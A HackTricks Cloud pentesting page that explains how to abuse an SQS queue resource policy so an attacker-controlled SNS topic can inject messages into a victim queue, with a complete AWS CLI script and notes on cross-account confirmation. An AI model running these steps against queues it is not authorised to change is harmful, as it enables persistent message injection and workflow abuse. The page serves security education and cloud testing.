AWS – SQS Cross-/Same-Account Injection via SNS Subscription + Queue Policy

Reading time: 4 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Description

Abuse an SQS queue resource policy to allow an attacker-controlled SNS topic to publish messages into a victim SQS queue. In the same account, an SQS subscription to an SNS topic auto-confirms; in cross-account, you must read the SubscriptionConfirmation token from the queue and call ConfirmSubscription. This enables unsolicited message injection that downstream consumers may implicitly trust.

Requirements

Ability to modify the target SQS queue resource policy: sqs:SetQueueAttributes on the victim queue.
Ability to create/publish to an SNS topic under attacker control: sns:CreateTopic, sns:Publish, and sns:Subscribe on the attacker account/topic.
Cross-account only: temporary sqs:ReceiveMessage on the victim queue to read the confirmation token and call sns:ConfirmSubscription.

Same-account exploitation

bash

REGION=us-east-1
# 1) Create victim queue and capture URL/ARN
Q_URL=$(aws sqs create-queue --queue-name ht-victim-q --region $REGION --query QueueUrl --output text)
Q_ARN=$(aws sqs get-queue-attributes --queue-url "$Q_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)

# 2) Create attacker SNS topic
TOPIC_ARN=$(aws sns create-topic --name ht-attacker-topic --region $REGION --query TopicArn --output text)

# 3) Allow that SNS topic to publish to the queue (queue resource policy)
cat > /tmp/ht-sqs-sns-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"AllowSNSTopicPublish","Effect":"Allow","Principal":{"Service":"sns.amazonaws.com"},"Action":"SQS:SendMessage","Resource":"REPLACE_QUEUE_ARN","Condition":{"StringEquals":{"aws:SourceArn":"REPLACE_TOPIC_ARN"}}}]}
JSON
sed -i.bak "s#REPLACE_QUEUE_ARN#$Q_ARN#g; s#REPLACE_TOPIC_ARN#$TOPIC_ARN#g" /tmp/ht-sqs-sns-policy.json
# Provide the attribute as a JSON map so quoting works reliably
cat > /tmp/ht-attrs.json <<JSON
{
  "Policy": "REPLACE_POLICY_JSON"
}
JSON
# Embed the policy file contents as a JSON string
POL_ESC=$(jq -Rs . /tmp/ht-sqs-sns-policy.json)
sed -i.bak "s#\"REPLACE_POLICY_JSON\"#$POL_ESC#g" /tmp/ht-attrs.json
aws sqs set-queue-attributes --queue-url "$Q_URL" --region $REGION --attributes file:///tmp/ht-attrs.json

# 4) Subscribe the queue to the topic (auto-confirms same-account)
aws sns subscribe --topic-arn "$TOPIC_ARN" --protocol sqs --notification-endpoint "$Q_ARN" --region $REGION

# 5) Publish and verify injection
aws sns publish --topic-arn "$TOPIC_ARN" --message {pwn:sns->sqs} --region $REGION
aws sqs receive-message --queue-url "$Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 10 --attribute-names All --message-attribute-names All

Cross-account notes

The queue policy above must allow the foreign TOPIC_ARN (attacker account).
Subscriptions won’t auto-confirm. Grant yourself temporary sqs:ReceiveMessage on the victim queue to read the SubscriptionConfirmation message and then call sns confirm-subscription with its Token.

Impact

Potential Impact: Continuous unsolicited message injection into a trusted SQS queue via SNS, potentially triggering unintended processing, data pollution, or workflow abuse.

tip